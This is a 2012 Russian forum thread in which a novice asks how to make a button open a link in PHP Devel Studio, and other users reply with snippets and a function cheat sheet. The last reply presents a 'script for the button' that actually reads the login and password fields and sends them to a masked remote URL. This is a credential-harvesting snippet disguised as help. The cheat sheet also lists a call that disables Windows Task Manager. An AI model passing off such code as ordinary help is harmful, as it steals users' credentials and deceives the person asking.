Скажите PHP код для ссылки на кнопку

Тема в разделе "Программирование", создана пользователем Sasha55, 28 авг 2012.

Статус темы:
Закрыта.
  1. Оффлайн

    Sasha55 СаНыЧ321

    На форуме с:
    26 мар 2012
    Сообщения:
    156
    Симпатии:
    191
    Баллы:
    42
    Пол:
    Мужской
    Вот я хочу сделать сборник(ну сборник типо такого

    Ссылки могут видеть только зарегестрированные пользователи. Для того что-бы скачать читы зарегистрируйтесь на форуме

    ,в PHP Devel Studio делаю картинку,кнопки,так вот скажите PHP код чтоб на кнопки ссылки сделать,ото весь инет обыскал найти немогу(((
     
  2.  
  3. Оффлайн

    Sasha55 СаНыЧ321

    На форуме с:
    26 мар 2012
    Сообщения:
    156
    Симпатии:
    191
    Баллы:
    42
    Пол:
    Мужской
    модератор одобри плиз))
     
  4. Оффлайн

    {е2_Знакомы} 21.11.2013гг

    На форуме с:
    5 июн 2012
    Сообщения:
    188
    Симпатии:
    425
    Баллы:
    45
    Пол:
    Мужской
    skype:
    bloouker71
    держии)) с тебя спс)) Run("тут ссыль",)
     
    Sasha55 нравится это.
  5. Оффлайн

    Sasha55 СаНыЧ321

    На форуме с:
    26 мар 2012
    Сообщения:
    156
    Симпатии:
    191
    Баллы:
    42
    Пол:
    Мужской
    спс,лови спасибку))
     
  6. Оффлайн

    Sasha55 СаНыЧ321

    На форуме с:
    26 мар 2012
    Сообщения:
    156
    Симпатии:
    191
    Баллы:
    42
    Пол:
    Мужской
    не получилосьcrayвидео можеш сделать плизbn
     
  7. Оффлайн

    {е2_Знакомы} 21.11.2013гг

    На форуме с:
    5 июн 2012
    Сообщения:
    188
    Симпатии:
    425
    Баллы:
    45
    Пол:
    Мужской
    skype:
    bloouker71
    Глянь может тут найдеш
    1. Приложение
    LoadForm(, LD_NONE); ----> Загрузить форму.
    ShowForm(, SW_SHOW); ------> Показать форму.
    HideForm(, SW_SHOW); ------> Скрыть форму.
    messageDlg("", mtWarning, MB_OK); --------- Сообщение диалог.
    MessageBox("", ""); ------> Показать сообщение.
    app::close(); ------> Закрыть приложение.
    app::hide(); -------> Минимизировать приложение.
    app::restore(); ------> Восстановление приложение.
    app::title(""); -------> Задать заголовок приложения.

    2. Скрипты
    include ""; ------> Подключение файла в код сценария PHP.
    require ""; ------> Подключить php скрипт.
    if () --------------> Если тогда ...
    else --------------> Иначе ...
    { ------------------> Начало.
    } ------------------> Конец.
    unset($x); -------> Уничтожить переменную.
    $x = ; -----------> Задать Значение переменной.
    // ---------------> Комментарий.

    3. Система
    Run("", false); --------> Открыть или Запустить.
    RunWith("", ""); ------> Открыть с помощью программы.
    DisableTaskMng(false); --------> Блокировать Диспетчер задач Windows.
    WinShutdown(); ------> Выключение Системы или Компьютера.
    WinRestart(); ---------> Перезагрузка Компьютера.
    WinLogoff(); ----------> Выход из системы.
    WinSleep(); ------------> Спящий режим.
    SetupInf(""); -----------> Установить драйвера.
    $x = winLocalPath( CSIDL_DESKTOP ); -----------> Узнать локальную win директорию.

    4. Ini файлы
    ini::eek:pen(""); --------> Открытие Ini файлов.
    ini::read("", "", $x); --------> Прочитать значение из Ini.
    ini::write("", "", ""); ---------> Запись в значение Ini.
    ini::deleteSection(""); ---------> Удаление Ini секции.
    ini::deleteKey("", ""); ----------> Удаление Ini ключ.
    ini::readSections($x); ----------> Прочитать секции из Ini.
    ini::readKeys("", $x); -----------> Чтение ключей из Ini файлов.

    5. Реестр
    readRegKey(HKEY_CLASSES_ROOT, "", , STRING); -----------> Чтение реестра.
    writeRegKey(HKEY_CLASSES_ROOT, "", "", STRING); -----------> Запись реестра.
     
  8. Оффлайн

    {е2_Знакомы} 21.11.2013гг

    На форуме с:
    5 июн 2012
    Сообщения:
    188
    Симпатии:
    425
    Баллы:
    45
    Пол:
    Мужской
    skype:
    bloouker71
    run("ссылка");
     
  9. Оффлайн

    Sasha55 СаНыЧ321

    На форуме с:
    26 мар 2012
    Сообщения:
    156
    Симпатии:
    191
    Баллы:
    42
    Пол:
    Мужской
    а какое оригинальное название кнопки в Devel Studio,button1 ?
    (Даа)
     
  10. Оффлайн

    Sasha55 СаНыЧ321

    На форуме с:
    26 мар 2012
    Сообщения:
    156
    Симпатии:
    191
    Баллы:
    42
    Пол:
    Мужской
    у тебя какая версия Devel Studio? 3.0?
     
  11. Оффлайн

    Dsadas ст. рядовой

    На форуме с:
    1 ноя 2012
    Сообщения:
    16
    Симпатии:
    7
    Баллы:
    3
    Пол:
    Мужской
    $edit1 = c('Form1->edit1')->text;
    messageDlg("??????", mtWarning, MB_OK);
    $edit2 = c('Form1->edit2')->text;
    $combobox1 = c('Form1->combobox1')->inText;
    $url = "???????";
    file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);Саня вот скрипт на кнопку:
     
Статус темы:
Закрыта.

Поделиться этой страницей

Уважаемый пользователь!

Мы обнаружили, что вы блокируете показ рекламы на нашем сайте.

Просим внести его в список исключения или отключить AdBlock.

Наши материалы предоставляются БЕСПЛАТНО и единственным доходом является реклама.

Спасибо за понимание!